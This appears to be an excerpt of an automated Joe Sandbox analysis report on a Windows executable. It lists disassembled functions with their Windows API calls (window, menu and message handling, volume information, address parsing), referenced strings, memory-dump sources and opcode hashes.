                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef071f22b06f52ef2ff259472164e5d768a7945fceea95d451ccb9992eb9f32
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3316071A00218EFDB21DB999885EAABBFCEB85715B1055EAE904B7221E7704E48C790
                                                                                                                                                                                                                                                                                                    Function 00E8CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E8CBB1
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00E8CBF7
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EF29C0,011962C0), ref: 00E8CC40
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4540e26e03a6b98ea9969cab99357b19fefaef9be4df448a136bf5d84aa4989a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 01b69736c6082d9b57717f9303dc28b8b33d5bf0f5dda621b311107fcf2cc1a0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4540e26e03a6b98ea9969cab99357b19fefaef9be4df448a136bf5d84aa4989a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A4191712043029FD724EF24DC85F5ABBE8AF86718F245A1DF5ADA7291D730E904CB62
                                                                                                                                                                                                                                                                                                    Function 00EB4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EBDCD0,00000000,?,?,?,?), ref: 00EB4F48
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 00EB4F65
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB4F75
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                    • Opcode ID: def9d30d54587b2a407aaf5144146df62946a3bd198bdda1311e85e36199c348
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7575c693b94b03c610bfab24f3915e21b37732414384eb8aaa614fbb9e2596eb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: def9d30d54587b2a407aaf5144146df62946a3bd198bdda1311e85e36199c348
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B319CB1204215AFDB218E78DC45BEB7BA9EB48328F206725F979B31E1D770EC509B50
                                                                                                                                                                                                                                                                                                    Function 00EA3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EA3AD4,?,?), ref: 00EA3DD5
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EA3AD7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA3AF8
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00EA3B63
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5ffd0fd218b0069b7d9675271f68721171622bc9ce1df632ed416f34cc03d5e0
                                                                                                                                                                                                                                                                                                    • Instruction ID: cdb8136658d0e1c54eaa13b8e0e543eea9aaba0cf969962176aad3849404867d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ffd0fd218b0069b7d9675271f68721171622bc9ce1df632ed416f34cc03d5e0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD3181756002019FCB20CF79C585AAA77E2EF1A318F249159F816AF6A2D731EE45C770
                                                                                                                                                                                                                                                                                                    Function 00EB4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EB49DC
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EB49F0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB4A14
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7a350447e113b501e466d7557cc71893d08688e4a9fd3d5f0e81bacdf0c38b6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 999372cc37739e99bf2d4047ac62c3b7630c26f8cfb0929cd1a0dc333bc311e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a350447e113b501e466d7557cc71893d08688e4a9fd3d5f0e81bacdf0c38b6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021BF72600229ABDF168F94CC42FEB3BA9EF88718F111214FA157B1D1DAB1E855DB90
                                                                                                                                                                                                                                                                                                    Function 00EB50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EB51A3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EB51B1
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB51B8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9fbdb01ba0d559806bca4328e98d7bcaa4dd869aaf3b49a7fcce902123b5c35e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 018507c76ca0f4a94cea707ff041a6d0bc2d33e12f98cb91b47b5a7ff9e43eae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fbdb01ba0d559806bca4328e98d7bcaa4dd869aaf3b49a7fcce902123b5c35e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E92192B5601649AFDB01DF28DC81EB737EDEB99368F041149FA00AB361CB70EC15CAA0
                                                                                                                                                                                                                                                                                                    Function 00EB4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EB42DC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EB42EC
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EB4312
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0fb870c99f56c93f3dde53839a70369b33c1ae9f42815f5c17398855e48bfb0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: bfe27e7cfbc6a2fa323072099394b2c0e8a2720df6cd42b11d4d9485d8afecf8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fb870c99f56c93f3dde53839a70369b33c1ae9f42815f5c17398855e48bfb0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21B072604218BBEF128F94CC85FFB3BAEEF89754F119124F900AB1E1CA719C5197A0
                                                                                                                                                                                                                                                                                                    Function 00E95439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00E9544D
                                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E954A1
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00EBDCD0), ref: 00E95515
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                    • Opcode ID: 707c450727c371aad0ac1305c13bb9bde0d636a1a49d05e418902839f47a4e04
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1066d7770fe0b6ef18442fad4f7953d51a6f1c363ffa050e3e1822b651b28e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 707c450727c371aad0ac1305c13bb9bde0d636a1a49d05e418902839f47a4e04
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09316171A00209AFDB11DF64C985EAABBF8EF04308F1440A8E409FB262D771EE45CB61
                                                                                                                                                                                                                                                                                                    Function 00EB8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 00EB8339
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00EB802F,00000000), ref: 00EB83B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                    • String ID: ($(
                                                                                                                                                                                                                                                                                                    • API String ID: 3814560230-3881858432
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5fd0fa37ff4821beeb8b598c8098a26838d38325eb7ed03eea1d92b0237db807
                                                                                                                                                                                                                                                                                                    • Instruction ID: d32715e173e7fbcb7d10f4a9ff9e37c1bd712ca7709993c05f150f8856d91098
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fd0fa37ff4821beeb8b598c8098a26838d38325eb7ed03eea1d92b0237db807
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9215C74201605DFC724DF29E850AA7B7F9FB89760F20561DEA75B73A0DB70A844CB60
                                                                                                                                                                                                                                                                                                    Function 00EB4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EB4CED
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EB4D02
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EB4D0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                    • Opcode ID: da5d00d0baadb1fc65654360eec4a9a4ca614e809d6e7d545d49116387672594
                                                                                                                                                                                                                                                                                                    • Instruction ID: 066f0c78500ad44ec4d39321db5385ec200004a50b2f23c3efd3885167d09e28
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da5d00d0baadb1fc65654360eec4a9a4ca614e809d6e7d545d49116387672594
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E511E3B1240248BEEF215E65CC06FEB7BA8EF85B68F111514FA55F20E1D671D850DB10
                                                                                                                                                                                                                                                                                                    Function 00E8389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E83712
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E83723
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: GetCurrentThreadId.KERNEL32 ref: 00E8372A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E83731
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00E838C4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8373B: GetParent.USER32(00000000), ref: 00E83746
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00E8390F
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00E83987), ref: 00E83937
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2c55c93fca84eb6df3dc250b67222f2f3d37ff946d167802a0e48615324ef2ab
                                                                                                                                                                                                                                                                                                    • Instruction ID: 03e6e56e8169e8b144086a0be11b8bdab45870a707433c4c2c2b711eca78b4aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c55c93fca84eb6df3dc250b67222f2f3d37ff946d167802a0e48615324ef2ab
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA11E7B56002096BCF01BF749C85AEE77A9AF94704F005075FD0DBB296EE709905DB30
                                                                                                                                                                                                                                                                                                    Function 00E259FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00E25A34
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,00E237B8,?,?,?,?,?,00E23709,?,?), ref: 00E25A91
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                    • String ID: <)$<)
                                                                                                                                                                                                                                                                                                    • API String ID: 2587070983-10615988
                                                                                                                                                                                                                                                                                                    • Opcode ID: 05c0140671f6253cc51451226363567015b8fe98424979bf92f6b7a2d2988da5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 612461d8229586aa9ca725d49d3f4f3d5d69da1138f2572b45c0ebcdf7bc8fbc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c0140671f6253cc51451226363567015b8fe98424979bf92f6b7a2d2988da5
